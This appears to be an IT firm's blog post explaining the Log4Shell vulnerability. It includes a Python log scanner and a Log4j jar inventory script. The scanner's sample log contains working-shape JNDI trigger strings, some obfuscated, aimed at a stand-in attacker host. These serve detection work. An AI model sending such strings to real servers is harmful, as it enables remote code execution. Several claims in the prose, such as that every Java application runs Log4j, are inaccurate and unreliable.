The Log4j exploit, called Log4Shell or CVE-2021-44228, has been in the news in recent weeks. However, many are asking what it is and why it is bad. How has it made its way into millions of servers? How can you protect yourself?
The Confusion
The main confusion around the exploit is that Log4j itself is not data but code. Log4j is not a malicious application or a virus. Log4j is simply a logging library for Java. For example, if you try to log into an account with the wrong username or password, Log4j keeps track of that failed attempt. It logs much more than usernames and passwords, though: it also records and displays error messages.
Where the Problem is and How it Works
The problem comes from the fact that every Java application is running Log4j to some extent. Some apps use it directly, while others use it indirectly through other libraries they depend on. Approximately 60% of applications use Log4j indirectly, which is why the exposure is so widespread.
The exploit works through JNDI (Java Naming and Directory Interface) lookups in log messages. Log4j allows expressions to be embedded in what it logs. Expressions perform the work of a Java program: among other things, they compute and assign values to variables and help control the execution flow of a program, such as displaying an error message when someone logs in with the wrong username or password. JNDI can store Java objects in remote locations and serialize them, somewhat like streaming them from a cloud server. When an application looks up or requests such an object, JNDI automatically goes to fetch it from the remote server.
It works because the link to that server could point to a malicious program. The malicious program could enable Remote Code Execution (RCE). RCE allows a hacker to run code on your machine by compromising the application that uses Log4j. So, say you are on a news app and you search for a certain topic. The keywords for the topic become the JNDI lookup. The app performs a JNDI lookup for articles linked to those keywords and then shows articles to download and read. The problem lies here. During the lookup process, an attacker modifies the lookup so that it points wherever they want it to go. After that, searching for those keywords brings back code that allows RCE. This is easy to do since Java is open source, so all the hacker has to know is how to code.
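Because the trigger is a lookup string that lands in a log message, the defender's first question is whether any such strings are already sitting in the server logs. The scanner below is an added example (not code from the original post or from EZETech): it recognises the `${jndi:...}` lookup shape in log lines, including the nested `${lower:...}` and `${key:-default}` forms that Log4j itself evaluates before the lookup runs, so a naive search for the literal text would not miss them. The log lines and the `attacker.example` host are constructed for the example.

```python
"""Spot Log4Shell-style JNDI lookup strings in log lines (defender's view).

Added example, not code from the original post or from EZETech. Log4j's
${...} lookup syntax can be nested (${lower:J} evaluates to "j") and can
carry a default value (${env:MISSING:-j} evaluates to "j" when the key is
unset), so searching only for the literal text "${jndi:" misses trivially
rewritten strings. This scanner collapses those two forms the way Log4j
would, then looks for the jndi: prefix. The log lines are constructed.
"""
import re

# An innermost ${...} group: its body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, this is the shape every Log4Shell trigger string has.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Evaluate one lookup body. Only the forms used for obfuscation are
    handled (lower:, upper:, and the ':-default' fallback); any other
    lookup is left untouched so the caller can still see it."""
    if ":-" in body:
        key, _, default = body.partition(":-")
        # env:/sys: keys cannot be resolved offline, so fall back to the
        # default value, which is exactly what the obfuscated form relies on.
        if key.lower().startswith("lower:"):
            return key[6:].lower()
        if key.lower().startswith("upper:"):
            return key[6:].upper()
        return default
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return "${" + body + "}"   # e.g. ${date:...} or ${jndi:...}: keep as is


def normalize(line: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until the line stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def is_jndi_lookup(line: str) -> bool:
    return JNDI_PATTERN.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI_PATTERN.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample: one clean request, three variants of the same trigger
# string carried in a User-Agent header, and an ordinary failed-login line.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://attacker.example/a}"',
    'login failed for user "alice" from 10.0.0.7',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Running it flags lines 2, 3 and 4 and prints each in its collapsed form, so an analyst sees the same `${jndi:...}` string regardless of how it was written. Run the same function over web-server access logs and application logs, since any field that ends up in a log message (User-Agent, form fields, headers) is a possible carrier.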
Am I Safe?
The version that was a problem has already been patched. However, just because Log4j has been updated doesn't mean that you're in the clear. We still need to wait for all applications using any version older than 2.16 to be updated to the latest version. Here we are at the mercy of the companies and developers.
What Can I Do?
On the server side it is fairly simple. There are settings that control whether the logging system can interpret logged data as code. On the everyday side, there is not much you can do besides general cybersecurity hygiene. Be on the alert for phishing scams, use a strong antivirus, and update your applications constantly. At EZETech, we make the process of keeping your data safe simple. With server monitoring and security control we can make sure that your server is protected. With risk management, password management, log and event management, backup and disaster recovery, our team of cybersecurity specialists strive to keep your data safe and secure.
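The server-side work starts with knowing which copies of Log4j a host actually runs, including the ones buried inside other applications' jars. The script below is an added example (not code from the original post or from EZETech): it walks a directory, opens every jar, descends into jars nested inside them (fat jars, WARs), reads the Log4j version from the manifest or Maven `pom.properties`, and reports whether each copy is at or above 2.16, has had the `JndiLookup` class removed, or still needs an update. The four jars it scans are constructed stand-ins built in a temporary directory so the example runs offline.

```python
"""Inventory Log4j 2 copies on a host and say which still need action.

Added example, not code from the original post or from EZETech. The cut-off
follows the post: anything older than 2.16 is treated as needing an update.
The jars built in demo() are constructed stand-ins, not real Log4j artifacts.
"""
import io
import tempfile
import zipfile
from pathlib import Path

CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
FIXED = (2, 16, 0)           # version named in the post


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.16' -> (2, 16, 0); unparsable -> None."""
    if not text:
        return None
    nums = []
    for part in text.split(".")[:3]:
        digits = ""
        for c in part:
            if not c.isdigit():
                break
            digits += c
        if not digits:
            return None
        nums.append(int(digits))
    return tuple(nums + [0] * (3 - len(nums)))


def classify(version, jndi_present):
    v = parse_version(version)
    if v is not None and v >= FIXED:
        return "ok"
    if not jndi_present:
        return "mitigated"       # JndiLookup.class was removed from the jar
    return "update"


def read_version(zf, names):
    """Prefer Implementation-Version in the manifest, then Maven pom.properties."""
    if "META-INF/MANIFEST.MF" in names:
        for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
            if line.startswith("Implementation-Version:"):
                return line.split(":", 1)[1].strip()
    for n in names:
        if n.startswith("META-INF/maven/org.apache.logging.log4j/") and n.endswith("pom.properties"):
            for line in zf.read(n).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    return None


def inspect_jar(blob, name, findings, depth=0):
    """Record a finding if this jar ships log4j-core; recurse into nested jars."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if any(n.startswith(CORE_PREFIX) for n in names):
            version = read_version(zf, names)
            findings.append((name, version, classify(version, JNDI_CLASS in names)))
        if depth < 3:            # fat jars and WARs embed further jars
            for n in sorted(names):
                if n.endswith((".jar", ".war", ".ear")):
                    inspect_jar(zf.read(n), f"{name}!/{n}", findings, depth + 1)
    return findings


def scan_tree(root):
    """(jar, version, status) for every Log4j core found under root, sorted by path."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".jar", ".war", ".ear"):
            inspect_jar(path.read_bytes(), str(path.relative_to(root)), findings)
    return sorted(findings, key=lambda f: f[0])


def _fake_jar(version=None, include_jndi=True, nested=None):
    """Build a minimal jar in memory (constructed stand-in for the example)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        manifest = "Manifest-Version: 1.0\n"
        if version:
            manifest += f"Implementation-Version: {version}\n"
            zf.writestr(CORE_PREFIX + "Logger.class", b"")
            if include_jndi:
                zf.writestr(JNDI_CLASS, b"")
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        if nested:
            zf.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", nested)
    return buf.getvalue()


def demo():
    """Scan a temp directory holding four constructed jars."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "old.jar").write_bytes(_fake_jar("2.14.1"))
        Path(d, "patched.jar").write_bytes(_fake_jar("2.17.1"))
        Path(d, "stripped.jar").write_bytes(_fake_jar("2.14.1", include_jndi=False))
        Path(d, "app.jar").write_bytes(_fake_jar(nested=_fake_jar("2.14.1")))
        return scan_tree(d)


if __name__ == "__main__":
    for jar, version, status in demo():
        print(f"{status:9} {version or '?':8} {jar}")
```

On a real host you would call `scan_tree("/opt")` or the application's install directory instead of `demo()`. The "mitigated" status corresponds to Apache's documented stop-gap of deleting `JndiLookup.class` from the jar; the setting the post alludes to is the `log4j2.formatMsgNoLookups` system property (or the `LOG4J_FORMAT_MSG_NO_LOOKUPS` environment variable) on Log4j 2.10 through 2.14.1, which Apache later described as insufficient on its own, so the "update" entries are the ones to act on.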
Contact EZETech today for more information on our IT services.